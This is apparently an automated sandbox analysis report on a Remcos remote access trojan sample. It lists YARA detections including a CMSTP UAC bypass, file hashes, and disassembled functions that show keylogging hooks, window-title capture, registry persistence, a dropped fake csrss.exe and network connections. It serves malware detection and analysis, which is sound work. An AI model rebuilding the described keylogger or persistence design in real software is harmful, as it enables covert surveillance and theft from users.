Description: unknown, Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:21:32
Start date:	23/05/2024
Path:	C:\Users\Public\Libraries\Efftwcmk.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Efftwcmk.PIF"
Imagebase:	0x400000
File size:	1'388'544 bytes
MD5 hash:	913C99449A29C2640D36B0D5FDF69289
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: csrss.exePID: 3832, Parent PID: 3668COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	9.2%
Total number of Nodes:	687
Total number of Limit Nodes:	34

Executed Functions

Function 33D4A3E0 Relevance: 9.1, APIs: 6, Instructions: 112
keyboardthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 33D4A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 33D4A422
GetKeyboardLayout.USER32(00000000), ref: 33D4A429
GetKeyState.USER32(00000010), ref: 33D4A433
GetKeyboardState.USER32(?), ref: 33D4A43E
ToUnicodeEx.USER32(33DB2B78,?,?,?,00000010,00000000,00000000), ref: 33D4A4FA

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 5c1a4b65c13d35ea492d112141a3d49a8d8293a8c94d4582b83d9ecc5b4a7a0a
Instruction ID: 452cbf684203e58ad6676694cf15182942037973f59047c00a268e7426c3d8f3
Opcode Fuzzy Hash: 5c1a4b65c13d35ea492d112141a3d49a8d8293a8c94d4582b83d9ecc5b4a7a0a
Instruction Fuzzy Hash: 25313E72504308FFD711DFA4DC45F9BBBECEB88744F40082AB645D61A0E7B1A949CBA2

Function 33D4A2B8 Relevance: 9.1, APIs: 6, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 33D4A2D3
SetWindowsHookExA.USER32(0000000D,33D4A2A4,00000000), ref: 33D4A2E1
GetLastError.KERNEL32 ref: 33D4A2ED

Part of subcall function 33D5B4EF: GetLocalTime.KERNEL32(00000000), ref: 33D5B509

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 33D4A33B
TranslateMessage.USER32(?), ref: 33D4A34A
DispatchMessageA.USER32(?), ref: 33D4A355

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID:
API String ID: 3219506041-0
Opcode ID: 9d02e70e5e1da1d92862bd1526a1b6de3ed5bf30f30cd19d8698fa313b48f8bf
Instruction ID: 6a74a2d660388bd6ae3bfe184eb661d7801a23156f8dd413a6de6df182bbc268
Opcode Fuzzy Hash: 9d02e70e5e1da1d92862bd1526a1b6de3ed5bf30f30cd19d8698fa313b48f8bf
Instruction Fuzzy Hash: E611A032E04301ABEB107FB5CC0E85B77FCEB95651B44062DF896D2580FE309606CBA2

Function 33D4F7A7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 33D53549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 33D53569
Part of subcall function 33D53549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,33DB52F0), ref: 33D53587
Part of subcall function 33D53549: RegCloseKey.ADVAPI32(?), ref: 33D53592

Sleep.KERNEL32(00000BB8), ref: 33D4F85B
ExitProcess.KERNEL32 ref: 33D4F8CA

Strings

pth_unenc, xrefs: 33D4F7BD, 33D4F804, 33D4F871
@{t, xrefs: 33D4F7B8, 33D4F7FE, 33D4F86B

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: @{t$pth_unenc
API String ID: 2281282204-4182115480
Opcode ID: 9ab71471dd7f6811ecbb163baca8a6e39d1168be1fa6ca8fde5e59b160fe5fbb
Instruction ID: 973dfb25aab245912dfe1953a6d5086e771d36c835727610f7439664295a1f30
Opcode Fuzzy Hash: 9ab71471dd7f6811ecbb163baca8a6e39d1168be1fa6ca8fde5e59b160fe5fbb
Instruction Fuzzy Hash: AC216762F00300ABEA0877BACD55A7E3BA95BC1510F80001CF0168BFC6EF648A1687F7

Function 33D54D86 Relevance: 6.1, APIs: 4, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 33D54DD5
LoadLibraryA.KERNEL32(?), ref: 33D54E17
LoadLibraryA.KERNEL32(?), ref: 33D54E76
GetProcAddress.KERNEL32(00000000,?), ref: 33D54E9E

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystem
String ID:
API String ID: 4217395396-0
Opcode ID: 3ffbda9c7c0e5a15e754de1be8aa913c9891dda5b3fb4c9316ea2599f4bc2603
Instruction ID: 504b353bc9d21e89801eb791935c3350ed78226d4257481f9a5c83b6919d45cd
Opcode Fuzzy Hash: 3ffbda9c7c0e5a15e754de1be8aa913c9891dda5b3fb4c9316ea2599f4bc2603
Instruction Fuzzy Hash: 6F31C3B6842315ABEB11EF69C844E8F77ECAF44B50F840A19F855E7200D734D9868BE7

Function 33D5B60D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,?,H#z), ref: 33D5B62A
GetUserNameW.ADVAPI32(?,?), ref: 33D5B642

Strings

H#z, xrefs: 33D5B616

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Name$ComputerUser
String ID: H#z
API String ID: 4229901323-2410801705
Opcode ID: a4245419455779e0fae48215532bde281e4c596d24ced058396cfce8e251d6ca
Instruction ID: aa8a6360d8af09878767339a9c58546f39ac3346d851eeb1283e38546305327b
Opcode Fuzzy Hash: a4245419455779e0fae48215532bde281e4c596d24ced058396cfce8e251d6ca
Instruction Fuzzy Hash: C701FB7290021DABDF05EBD4DC44AEEBBBCAF44315F100166A506F7550EEB06A89CBA4

Function 33D5B380 Relevance: 4.6, APIs: 3, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 33D5B3A7
InternetOpenUrlW.WININET(00000000,33DAC70C,00000000,00000000,80000000,00000000), ref: 33D5B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 33D5B3D6

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Internet$Open$FileRead
String ID:
API String ID: 72386350-0
Opcode ID: d82a2857929e912ca352cad33c0b6e887c94f401eb70de3b7cd8921d545fd4b6
Instruction ID: c8b1a6b9e05a482288bad4edf410f7430c3254bdb3331352c14ab555cde97df3
Opcode Fuzzy Hash: d82a2857929e912ca352cad33c0b6e887c94f401eb70de3b7cd8921d545fd4b6
Instruction Fuzzy Hash: E211A372906325ABE624AF36CC49DAF7FECEF85661F40052DF806A2141DF649809C6B2

Function 33D73837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,33D734BF,00000034), ref: 33D73849
CryptGenRandom.ADVAPI32(?,00000034,?,?,00000000,00000000,00000001,F0000000,?,?,33D734BF,00000034), ref: 33D7385F
CryptReleaseContext.ADVAPI32(?,00000000,?,00000034,?,?,00000000,00000000,00000001,F0000000,?,?,33D734BF,00000034), ref: 33D73871

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 7cb64e71033d01b8b9b3ac398bfdd44993b43c81633e49d242569d304879b2f5
Instruction ID: c5359831b5493f413eff78a293b764b705b5c7dac057d23da4c297718e3ef8b7
Opcode Fuzzy Hash: 7cb64e71033d01b8b9b3ac398bfdd44993b43c81633e49d242569d304879b2f5
Instruction Fuzzy Hash: 68E09236308310BAF7301F25DC09F463BA9EF85B60F210639F2A6E44D4D6728421C594

Function 33D88957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 33D88996

Strings

GetSystemTimePreciseAsFileTime, xrefs: 33D88972

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: 95b9590b27c36aa72112664ceb3a427871445494504f04ffc745080e3c578ead
Instruction ID: e8c3e37b8de66a2696734568e1dcec5b9f65288d888796b84b87442f25b8a0ae
Opcode Fuzzy Hash: 95b9590b27c36aa72112664ceb3a427871445494504f04ffc745080e3c578ead
Instruction Fuzzy Hash: E9E0E572E02218FB9711AF34DC0497EBBA5DF04602B400299FC0A6B200DE712D068AD5

Function 33D74B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005B53), ref: 33D74B4C

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 769e896b734d8a3156badb869eb550c0d1da95979a39057dc3912adc39da3395
Instruction ID: f5a7bbded4f9d63391d933505220cbb1c8ab7181a124e740e9ee1765ad9422e2
Opcode Fuzzy Hash: 769e896b734d8a3156badb869eb550c0d1da95979a39057dc3912adc39da3395
Instruction Fuzzy Hash:

Function 33D54F2A Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 809
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 33D54F7B
WSAGetLastError.WS2_32(00000000,00000001), ref: 33D5518C
Sleep.KERNEL32(00000000), ref: 33D55AD7

Part of subcall function 33D5B4EF: GetLocalTime.KERNEL32(00000000), ref: 33D5B509

Strings

C:\Users\user\AppData\Roaming\csrss.exe, xrefs: 33D553C0
Connecting | , xrefs: 33D55108
Exe, xrefs: 33D553F5
Connected | , xrefs: 33D5524E
Rmc-9VASLD, xrefs: 33D5542C
@{t, xrefs: 33D553E9
H#z, xrefs: 33D54F37, 33D54F54, 33D55328, 33D55A9E
Connection Error: , xrefs: 33D5519F

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: @{t$C:\Users\user\AppData\Roaming\csrss.exe$Connected | $Connecting | $Connection Error: $Exe$H#z$Rmc-9VASLD
API String ID: 524882891-850441329
Opcode ID: f0e93c6de1985718f4d0c62f06867dd102ac21d07ed92d36996bb27fc55ded86
Instruction ID: aac41474d50590578a25ff7314e92ff6bca7c0abc4a4b877c7393e5be42625fc
Opcode Fuzzy Hash: f0e93c6de1985718f4d0c62f06867dd102ac21d07ed92d36996bb27fc55ded86
Instruction Fuzzy Hash: FA526A32E003149BDB19E736DD91AFEB3B59F50200F9045A9E40BA79D1EF301F8ACA64

Function 33D4E9C5 Relevance: 21.8, APIs: 5, Strings: 7, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 33D5CB50: LoadLibraryA.KERNEL32(33DACC0C,GetProcessImageFileNameW,?,?,?,?,33D4E9E1), ref: 33D5CB65
Part of subcall function 33D5CB50: LoadLibraryA.KERNEL32(33DACC38,SetProcessDpiAwareness,?,?,?,?,33D4E9E1), ref: 33D5CB9A

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\csrss.exe,00000104), ref: 33D4E9EE

Strings

C:\Users\user\AppData\Roaming\csrss.exe, xrefs: 33D4E9E6, 33D4EE0F
Exe, xrefs: 33D4EB14
Software\, xrefs: 33D4EAC3
Rmc-9VASLD, xrefs: 33D4EB05, 33D4EB62
Access Level: , xrefs: 33D4F29F
@{t, xrefs: 33D4EE14, 33D4EE1E, 33D4EE53, 33D4EE7A, 33D4EF5B
H#z, xrefs: 33D4EA5D, 33D4EA96, 33D4ED47, 33D4ED7B, 33D4EDD3, 33D4EEAC, 33D4EF66, 33D4F036, 33D4F0D8, 33D4F103, 33D4F12B, 33D4F154, 33D4F187, 33D4F1C7, 33D4F1F3

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: LibraryLoad$FileModuleName
String ID: @{t$Access Level: $C:\Users\user\AppData\Roaming\csrss.exe$Exe$H#z$Rmc-9VASLD$Software\
API String ID: 3130748871-1846334066
Opcode ID: 1568380b45bf12cdea2f279c0baf8d481e8325cb53523b978603e95a84edff87
Instruction ID: fdd03a42b4a976f009342523d461ce14e7ed8fa132490379296a9e7fe17de52d
Opcode Fuzzy Hash: 1568380b45bf12cdea2f279c0baf8d481e8325cb53523b978603e95a84edff87
Instruction Fuzzy Hash: 7832F866F443406BEE15B775CC65B7E27DA5FC1680F84082DF4439BAD2EE648D0A83B1

Function 33D5CB50 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 176
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(33DACC0C,GetProcessImageFileNameW,?,?,?,?,33D4E9E1), ref: 33D5CB65
LoadLibraryA.KERNEL32(33DACC38,SetProcessDpiAwareness,?,?,?,?,33D4E9E1), ref: 33D5CB9A
LoadLibraryA.KERNEL32(Rstrtmgr,33DACDC8,?,?,?,?,33D4E9E1), ref: 33D5CD19

Strings

Iphlpapi, xrefs: 33D5CCC1, 33D5CCCB, 33D5CCD6
Rstrtmgr, xrefs: 33D5CD0E, 33D5CD18, 33D5CD23, 33D5CD33, 33D5CD43
SetProcessDpiAwareness, xrefs: 33D5CB8F, 33D5CB94, 33D5CBA8
GetProcessImageFileNameW, xrefs: 33D5CB5A, 33D5CB5F, 33D5CB7F
ntdll, xrefs: 33D5CBBD, 33D5CBC2, 33D5CCA1, 33D5CCB1, 33D5CCE6

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: LibraryLoad
String ID: GetProcessImageFileNameW$Iphlpapi$Rstrtmgr$SetProcessDpiAwareness$ntdll
API String ID: 1029625771-2948753092
Opcode ID: 589b46bc0ce07c214824ed0bd17f31d9e3e0a9e7c8860cd8dc5d5d2696c3fee4
Instruction ID: 7a8c22fe1674d3ef1e90a0279a3daa310abf1d360215da82096bb23d08f11af8
Opcode Fuzzy Hash: 589b46bc0ce07c214824ed0bd17f31d9e3e0a9e7c8860cd8dc5d5d2696c3fee4
Instruction Fuzzy Hash: 9541EFA1D4231CFEDE11BBBE8E4CD1B3EECE9415B43410856B124F7202EAB89445CFA8

Function 33D4A726 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 33D4A740

Part of subcall function 33D4A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 33D4A6AB
Part of subcall function 33D4A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,33D4A74D), ref: 33D4A6BA
Part of subcall function 33D4A675: Sleep.KERNEL32(00002710,?,?,?,33D4A74D), ref: 33D4A6E7
Part of subcall function 33D4A675: CloseHandle.KERNEL32(00000000), ref: 33D4A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 33D4A77C
GetFileAttributesW.KERNEL32(00000000), ref: 33D4A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 33D4A7A4
PathFileExistsW.SHLWAPI(00000000), ref: 33D4A81E

Part of subcall function 33D5C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 33D5C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,33DA6468,?,00000000,00000000,00000000,00000000,00000000), ref: 33D4A927

Strings

H#z, xrefs: 33D4A7AC, 33D4A907

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: H#z
API String ID: 3795512280-2410801705
Opcode ID: eae1a6b221849e71dc7a06455e53f91e25a07fd16f51942afb7704a1e5cbd0b4
Instruction ID: ad08fefbecbdff8c0b82aae6f5dce7df21391e57ab1d41570766ef4526043eab
Opcode Fuzzy Hash: eae1a6b221849e71dc7a06455e53f91e25a07fd16f51942afb7704a1e5cbd0b4
Instruction Fuzzy Hash: DF51C472E083045BDB08FB71C864ABE77AA9FD0640F44081DF583ABAD2DF24990AC771

Function 33D8AC49 Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000001,7FFFFFFF,?,?,?,?,33D8AE9A,00000001,00000001,00000000), ref: 33D8ACA3
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,33D8AE9A,00000001,00000001,00000000,?,?,?), ref: 33D8AD29
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 33D8AE23
__freea.LIBCMT ref: 33D8AE30

Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169

__freea.LIBCMT ref: 33D8AE39
__freea.LIBCMT ref: 33D8AE5E

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 6a06166d03f6d2cd3e9d78078ae88cf0ad5c5baec53fb34dae19faeafbab9b1f
Instruction ID: fcccdb00ac0858ddc00d5b61cbf1c70849d52ccbd99d1bb83d976d27183ee56d
Opcode Fuzzy Hash: 6a06166d03f6d2cd3e9d78078ae88cf0ad5c5baec53fb34dae19faeafbab9b1f
Instruction Fuzzy Hash: 2751B4B6B00316AFEB168F64CC40EAB77AAEF44B54F554A29FD04DF140EB74EC5186A0

Function 33D4ACD6 Relevance: 7.7, APIs: 5, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000001F4), ref: 33D4AD43
GetForegroundWindow.USER32 ref: 33D4AD49
GetWindowTextLengthW.USER32(00000000), ref: 33D4AD52
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 33D4AD86
Sleep.KERNEL32(000003E8), ref: 33D4AE54

Part of subcall function 33D4A636: SetEvent.KERNEL32(?,?,?,33D4B82F,?,?,?,?,?,00000000), ref: 33D4A662

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Window$SleepText$EventForegroundLength
String ID:
API String ID: 828943121-0
Opcode ID: 723232dcd066030330fc2af7c7c6f145593145aaf8e01ce94c22f8a0bf685ca4
Instruction ID: a789935d420c7de8f2019c3ecc3f2db08ee79c8378e4856e22b87cf95a2923e7
Opcode Fuzzy Hash: 723232dcd066030330fc2af7c7c6f145593145aaf8e01ce94c22f8a0bf685ca4
Instruction Fuzzy Hash: C151F572E083419BD714EB34C894AAF7BE9AF94600F44092DF49693AD1EF34D949C7A2

Function 33D5C3F1 Relevance: 7.6, APIs: 5, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000080,40000000,00000000,00000000,00000002,00000080,00000000), ref: 33D5C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 33D5C44D
CloseHandle.KERNEL32(00000000), ref: 33D5C459
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 33D5C46A
CloseHandle.KERNEL32(00000000), ref: 33D5C477

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: dcd983cec9ad15155cef69e2f07feea21e733f4f4c260c9127145ea4c191ff13
Instruction ID: 8db800132030b9acba6dd878b808071c24fea6b66ccb7eca7d52d6a0776138cf
Opcode Fuzzy Hash: dcd983cec9ad15155cef69e2f07feea21e733f4f4c260c9127145ea4c191ff13
Instruction Fuzzy Hash: 43118EB62052147FFA045E349C89EBB739CEB46AA6F004629F593D31C0CB21AC0A8621

Function 33D8EF58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

Part of subcall function 33D8F077: _abort.LIBCMT ref: 33D8F0A9
Part of subcall function 33D8F077: _free.LIBCMT ref: 33D8F0DD

Part of subcall function 33D8ECEC: GetOEMCP.KERNEL32(00000000,?,?,33D8EF75,?), ref: 33D8ED17

_free.LIBCMT ref: 33D8EFD0
_free.LIBCMT ref: 33D8F006

Strings

XKz, xrefs: 33D8F04F
XKz, xrefs: 33D8F04A

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: XKz$XKz
API String ID: 2991157371-3037279202
Opcode ID: 778d9b736c8b461aba3a8fa0539cb77d93a8efc23777bb92b0a5677f634f591c
Instruction ID: 387abfea14f0b7b319c5a73f05f0c7586855f75270b184a26ce9a6bf7b100979
Opcode Fuzzy Hash: 778d9b736c8b461aba3a8fa0539cb77d93a8efc23777bb92b0a5677f634f591c
Instruction Fuzzy Hash: FB31B376D04248AFEB00DFA9D440B99B7E8EF407A1F254199E5149F6A0EB32BD41CF61

Function 33D5376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,33DA74AC), ref: 33D5377E
RegSetValueExA.KERNEL32(33DA74AC,33DA74B8,00000000,?,00000000,00000000,33DB52F0,?,?,33D4F853,33DA74B8,33DA74AC), ref: 33D537A6
RegCloseKey.ADVAPI32(33DA74AC,?,?,33D4F853,33DA74B8,33DA74AC), ref: 33D537B1

Strings

pth_unenc, xrefs: 33D53773

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: aca6a3ac1c68022c03061d4945c352d6aa6cae450d0cb473d2bd09660cecf27a
Instruction ID: 318dc9f46e400fbc3534ab75b72af3d5730a1fdf18cce2e219cd0f22d79441cc
Opcode Fuzzy Hash: aca6a3ac1c68022c03061d4945c352d6aa6cae450d0cb473d2bd09660cecf27a
Instruction Fuzzy Hash: E7F09073840218BFEF00AFA1DC45EEE3B6CEF04650F104254FD1AA6010EB319E14DBA0

Function 33D448C8 Relevance: 6.1, APIs: 4, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(FFFFFFFF,00000000,00000000), ref: 33D448E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 33D44A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 33D44A0E
WSAGetLastError.WS2_32 ref: 33D44A21

Part of subcall function 33D5B4EF: GetLocalTime.KERNEL32(00000000), ref: 33D5B509

Memory Dump Source

